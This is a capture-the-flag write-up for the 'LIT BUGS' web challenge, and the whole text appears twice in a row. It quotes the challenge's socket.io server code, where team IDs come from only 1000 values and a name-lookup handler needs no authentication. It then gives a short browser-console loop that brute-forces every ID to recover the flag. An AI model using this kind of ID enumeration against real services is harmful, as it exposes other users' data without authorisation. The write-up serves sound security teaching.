# web/LIT BUGS (92 solves / 129 points)  
## Description  
Last year’s LIT platform may or may not have had some security
vulnerabilities. We have created a simplified version of last year’s platform
called LIT BUGS (Lexington Informatics Tournament’s Big Unsafe Grading
System). The flag is the team name of the only registered user. Visit LIT BUGS
[here](http://websites.litctf.live:8000/)  
Downloads:  
[LIT
Bugs.zip](https://drive.google.com/uc?export=download&id=1KH4xaRabJVIFFfmNKxep5ZLFH24muqHy)

## Solution:  
When I clicked the link the description I was presented with a website that
looks a lot like the current ctf website. This website has only a home page, a
register page, a login page, and a contest page.  
After analyzing the source code given, I found that the website uses
websockets for the register and login functions. In addition to this, there is
also an endpoint that returns a teams name when given their ID.

Relevant code:

	io.on('connection',(socket) => {  
		socket.on('login',(tn,pwd) => {  
			if(accounts[tn] == undefined || accounts[tn]["password"] != md5(pwd)) {  
				socket.emit("loginRes",false,-3);  
				return;  
			}  
			socket.emit("loginRes",true,accounts[tn]["rand_id"]);  
			return;  
		});

		socket.on('reqName',(rand_id) => {  
			name = id2Name[parseInt(rand_id)];  
			socket.emit("reqNameRes",name);  
		});

		socket.on('register',(tn,pwd) => {  
			if(accounts[tn] != undefined) {  
				socket.emit("regRes",false,-1);  
				return;  
			}  
			if(Object.keys(accounts).length >= 500) {  
				socket.emit("regRes",false,-2);  
				return;  
			}  
			var rand_id = Math.floor(Math.random() * 1000);  
			while(id2Name[rand_id] != undefined) {  
				rand_id = Math.floor(Math.random() * 1000);  
			}  
			accounts[tn] = {  
				"password": md5(pwd),  
				"rand_id": rand_id  
			};  
			id2Name[rand_id] = tn;  
			socket.emit("regRes",true,rand_id);  
		});  
	});

As you can see from this code, ID's are generated by taking a random number
from 1 to 1000. With only 1000 possible ID's, this is well within bruteforcing
range. The endpoint that allows name lookup based on ID's should be vulnerable
to a bruteforce attack, as the flag is the name of a team. I made a short JS
script to run in my browser's JS console which bruteforced all 1000 ID's:  
socket.on("reqNameRes",(name)=>{  
	console.log(name)  
});  
for(var i = 0;i<1000;i++){  
	socket.emit("reqName",i)  
}  
This worked, and after looking through the results, I found the following
flag:

## Flag  
flag{if_y0u_d1d_not_brut3force_ids_plea5e_c0ntact_codetiger}

Original writeup
(https://github.com/3TH3R3AL/CTFwriteups/blob/main/LIT%20BUGS.md).# web/LIT BUGS (92 solves / 129 points)  
## Description  
Last year’s LIT platform may or may not have had some security
vulnerabilities. We have created a simplified version of last year’s platform
called LIT BUGS (Lexington Informatics Tournament’s Big Unsafe Grading
System). The flag is the team name of the only registered user. Visit LIT BUGS
[here](http://websites.litctf.live:8000/)  
Downloads:  
[LIT
Bugs.zip](https://drive.google.com/uc?export=download&id=1KH4xaRabJVIFFfmNKxep5ZLFH24muqHy)

## Solution:  
When I clicked the link the description I was presented with a website that
looks a lot like the current ctf website. This website has only a home page, a
register page, a login page, and a contest page.  
After analyzing the source code given, I found that the website uses
websockets for the register and login functions. In addition to this, there is
also an endpoint that returns a teams name when given their ID.

Relevant code:

io.on('connection',(socket) => {  
socket.on('login',(tn,pwd) => {  
if(accounts[tn] == undefined || accounts[tn]["password"] != md5(pwd)) {  
socket.emit("loginRes",false,-3);  
return;  
}  
socket.emit("loginRes",true,accounts[tn]["rand_id"]);  
return;  
});

socket.on('reqName',(rand_id) => {  
name = id2Name[parseInt(rand_id)];  
socket.emit("reqNameRes",name);  
});

socket.on('register',(tn,pwd) => {  
if(accounts[tn] != undefined) {  
socket.emit("regRes",false,-1);  
return;  
}  
if(Object.keys(accounts).length >= 500) {  
socket.emit("regRes",false,-2);  
return;  
}  
var rand_id = Math.floor(Math.random() * 1000);  
while(id2Name[rand_id] != undefined) {  
rand_id = Math.floor(Math.random() * 1000);  
}  
accounts[tn] = {  
"password": md5(pwd),  
"rand_id": rand_id  
};  
id2Name[rand_id] = tn;  
socket.emit("regRes",true,rand_id);  
});  
});

As you can see from this code, ID's are generated by taking a random number
from 1 to 1000. With only 1000 possible ID's, this is well within bruteforcing
range. The endpoint that allows name lookup based on ID's should be vulnerable
to a bruteforce attack, as the flag is the name of a team. I made a short JS
script to run in my browser's JS console which bruteforced all 1000 ID's:  
socket.on("reqNameRes",(name)=>{  
console.log(name)  
});  
for(var i = 0;i<1000;i++){  
socket.emit("reqName",i)  
}  
This worked, and after looking through the results, I found the following
flag:

## Flag  
flag{if_y0u_d1d_not_brut3force_ids_plea5e_c0ntact_codetiger}

Original writeup
(https://github.com/3TH3R3AL/CTFwriteups/blob/main/LIT%20BUGS.md).